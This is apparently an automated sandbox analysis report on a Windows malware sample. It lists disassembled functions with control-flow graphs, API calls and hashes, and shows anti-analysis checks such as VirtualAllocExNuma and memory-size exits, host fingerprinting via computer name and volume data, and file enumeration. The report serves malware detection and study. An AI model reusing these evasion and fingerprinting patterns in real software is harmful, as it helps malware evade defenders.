                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: a146e3048cdcd355f448d7762ef9e3d6ea45f06cda6e359cd3d620b2aaa9df58
                            • Instruction ID: 793173d812c81a9a6a6e1e3408283b43f67659f72d9caea9fc95f23e4de4fb3e
                            • Opcode Fuzzy Hash: a146e3048cdcd355f448d7762ef9e3d6ea45f06cda6e359cd3d620b2aaa9df58
                            • Instruction Fuzzy Hash: B9517D70A04701DFEB21AF79DD84A2F7BF8BB54705B20582EE542C2611DBBCD4429B2A
                            Function 00452740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2782 452740-452783 GetWindowsDirectoryA 2783 452785 2782->2783 2784 45278c-4527ea GetVolumeInformationA 2782->2784 2783->2784 2785 4527ec-4527f2 2784->2785 2786 4527f4-452807 2785->2786 2787 452809-452820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 452826-452844 wsprintfA 2787->2788 2789 452822-452824 2787->2789 2790 45285b-452872 call 4571e0 2788->2790 2789->2790
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0045277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004493B6,00000000,00000000,00000000,00000000), ref: 004527AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0045280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452816
                            • wsprintfA.USER32 ref: 0045283B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 4aa164a4989e14daaa3be4549d9cfe61fece48d857ef72b232c9bee4cfdb633d
                            • Instruction ID: ee4ae8b9d895e1535123831aa8dac787bd6f260257a394d472edf61c9f3554c1
                            • Opcode Fuzzy Hash: 4aa164a4989e14daaa3be4549d9cfe61fece48d857ef72b232c9bee4cfdb633d
                            • Instruction Fuzzy Hash: FD3181B1904209AFCB14DFB88A859EFBFBCEF59701F10016EE905E7251E2748A448BA5
                            Function 00434BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 434bc0-434bce 2794 434bd0-434bd5 2793->2794 2794->2794 2795 434bd7-434c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 432a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00434BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00434C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00434C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00434C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00434C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: ce0c6f00ce4a5c73a28ed25031f023cb2cb441e63d4b49a40aef3a464ea908a6
                            • Instruction ID: 9a19797f1418511b03baf722d700607c6245020c8aaec77932ceca88d707ad7f
                            • Opcode Fuzzy Hash: ce0c6f00ce4a5c73a28ed25031f023cb2cb441e63d4b49a40aef3a464ea908a6
                            • Instruction Fuzzy Hash: DA012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390DBB499048FD4
                            Function 00431030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 431030-431055 GetCurrentProcess VirtualAllocExNuma 2799 431057-431058 ExitProcess 2798->2799 2800 43105e-43107b VirtualAlloc 2798->2800 2801 431082-431088 2800->2801 2802 43107d-431080 2800->2802 2803 4310b1-4310b6 2801->2803 2804 43108a-4310ab VirtualFree 2801->2804 2802->2801 2804->2803
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00431046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0043104D
                            • ExitProcess.KERNEL32 ref: 00431058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0043106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004310AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 1803ec1ebb426f48a60d01856619e6202f644587dbaec05cf5b102e7cfd0eb27
                            • Instruction ID: 7e0e8af47752e2a02b69e278021f9486144b8e099cd26fdd56a9a1e83efff4b0
                            • Opcode Fuzzy Hash: 1803ec1ebb426f48a60d01856619e6202f644587dbaec05cf5b102e7cfd0eb27
                            • Instruction Fuzzy Hash: 7E01F4717402047BEB244A75AC1AF6B77AEA789B05F30A019FB05E73D0D9F5E9008A78
                            Function 0044EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 44ee90-44eeb5 call 432930 2808 44eeb7-44eebf 2805->2808 2809 44eec9-44eecd call 436c40 2805->2809 2808->2809 2810 44eec1-44eec3 lstrcpy 2808->2810 2812 44eed2-44eee8 StrCmpCA 2809->2812 2810->2809 2813 44ef11-44ef18 call 432a20 2812->2813 2814 44eeea-44ef02 call 432a20 call 432930 2812->2814 2819 44ef20-44ef28 2813->2819 2824 44ef04-44ef0c 2814->2824 2825 44ef45-44efa0 call 432a20 * 10 2814->2825 2819->2819 2821 44ef2a-44ef37 call 432930 2819->2821 2821->2825 2829 44ef39 2821->2829 2824->2825 2828 44ef0e-44ef0f 2824->2828 2831 44ef3e-44ef3f lstrcpy 2828->2831 2829->2831 2831->2825
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0044EEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0044EF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: a086d9542672e710ddb60140fbb5683c3ff5bdd2e9564af2aa99fd25f0bf4cc0
                            • Instruction ID: bc9b629cec51bc3711470c4d5c61012339becdf2c63c1a1bc0b53efc7b1dfef2
                            • Opcode Fuzzy Hash: a086d9542672e710ddb60140fbb5683c3ff5bdd2e9564af2aa99fd25f0bf4cc0
                            • Instruction Fuzzy Hash: EF2146707202059BDB21FF7ADD4669F77A4BF14304F10642EB84ADB212DA78EC048798
                            Function 004310C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 4310c0-4310cb 2887 4310d0-4310dc 2886->2887 2889 4310de-4310f3 GlobalMemoryStatusEx 2887->2889 2890 431112-431114 ExitProcess 2889->2890 2891 4310f5-431106 2889->2891 2892 43111a-43111d 2891->2892 2893 431108 2891->2893 2893->2890 2894 43110a-431110 2893->2894 2894->2890 2894->2892
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: e9cda86cbf272b8913d3592ce8b0ad6102a7bb868bf1527b3eee94f7d29cb645
                            • Instruction ID: fc61dbedbc502bd342af2b5950f01ba6a8194f1c6836e0a7f2850d835ba078ed
                            • Opcode Fuzzy Hash: e9cda86cbf272b8913d3592ce8b0ad6102a7bb868bf1527b3eee94f7d29cb645
                            • Instruction Fuzzy Hash: 0DF02E7010424447EF146A64D94535EF7D9E70E350F10253BDEA6C22F1E278C840813F
                            Function 00448C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2895 448c88-448cc4 StrCmpCA 2897 448cc6-448cc7 ExitProcess 2895->2897 2898 448ccd-448ce6 2895->2898 2900 448ee2-448eef call 432a20 2898->2900 2901 448cec-448cf1 2898->2901 2902 448cf6-448cf9 2901->2902 2904 448ec3-448edc 2902->2904 2905 448cff 2902->2905 2904->2900 2945 448cf3 2904->2945 2907 448d84-448d92 StrCmpCA 2905->2907 2908 448da4-448db8 StrCmpCA 2905->2908 2909 448d06-448d15 lstrlen 2905->2909 2910 448e6f-448e7d StrCmpCA 2905->2910 2911 448e88-448e9a lstrlen 2905->2911 2912 448e56-448e64 StrCmpCA 2905->2912 2913 448d30-448d3f lstrlen 2905->2913 2914 448dbd-448dcb StrCmpCA 2905->2914 2915 448ddd-448deb StrCmpCA 2905->2915 2916 448dfd-448e0b StrCmpCA 2905->2916 2917 448e1d-448e2b StrCmpCA 2905->2917 2918 448e3d-448e4b StrCmpCA 2905->2918 2919 448d5a-448d69 lstrlen 2905->2919 2907->2904 2936 448d98-448d9f 2907->2936 2908->2904 2924 448d17-448d1c call 432a20 2909->2924 2925 448d1f-448d2b call 432930 2909->2925 2910->2904 2928 448e7f-448e86 2910->2928 2929 448ea4-448eb0 call 432930 2911->2929 2930 448e9c-448ea1 call 432a20 2911->2930 2912->2904 2927 448e66-448e6d 2912->2927 2931 448d41-448d46 call 432a20 2913->2931 2932 448d49-448d55 call 432930 2913->2932 2914->2904 2920 448dd1-448dd8 2914->2920 2915->2904 2921 448df1-448df8 2915->2921 2916->2904 2922 448e11-448e18 2916->2922 2917->2904 2923 448e31-448e38 2917->2923 2918->2904 2926 448e4d-448e54 2918->2926 2933 448d73-448d7f call 432930 2919->2933 2934 448d6b-448d70 call 432a20 2919->2934 2920->2904 2921->2904 2922->2904 2923->2904 2924->2925 2954 448eb3-448eb5 2925->2954 2926->2904 2927->2904 2928->2904 2929->2954 2930->2929 2931->2932 2932->2954 2933->2954 2934->2933 2936->2904 2945->2902 2954->2904 2955 448eb7-448eb9 2954->2955 2955->2904 2956 448ebb-448ebd lstrcpy 2955->2956 2956->2904
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: c66ed4dd19b8a7f67e4c7f6d7fbf9cc3c421d02007dbb3de9a608e36fc8bd856
                            • Instruction ID: 66136d71e5f3fdd0ed8eb61edf8508efd8aea09e3235a6ca4fc3bfac7046a5a2
                            • Opcode Fuzzy Hash: c66ed4dd19b8a7f67e4c7f6d7fbf9cc3c421d02007dbb3de9a608e36fc8bd856
                            • Instruction Fuzzy Hash: 66E01A78601209EFDB24DBA9D984D2A77ADEF58700B01146DFA009B7A2DA74ED00C76A
                            Function 00452AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2957 452ad0-452b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 452b44-452b59 2957->2958 2959 452b24-452b36 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452AFF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452B06
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00452B1A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 8e07a998aff03f5423099b5733487d8bf9243b9f6ccf324b35a55147f7ce14ff
                            • Instruction ID: 5ea8a999c92447e37b5d30737b9f35c94039e8d365f78dbb13d987e5ef9f8cda
                            • Opcode Fuzzy Hash: 8e07a998aff03f5423099b5733487d8bf9243b9f6ccf324b35a55147f7ce14ff
                            • Instruction Fuzzy Hash: 2301A272A44608ABCB10CF99ED45B9AF7BCF745B21F00026BFD15D3780D7B8190486A5

                            Non-executed Functions

                            Function 00442390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004423D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004423F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00442402
                            • lstrlen.KERNEL32(\*.*), ref: 0044240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00442436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00442486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
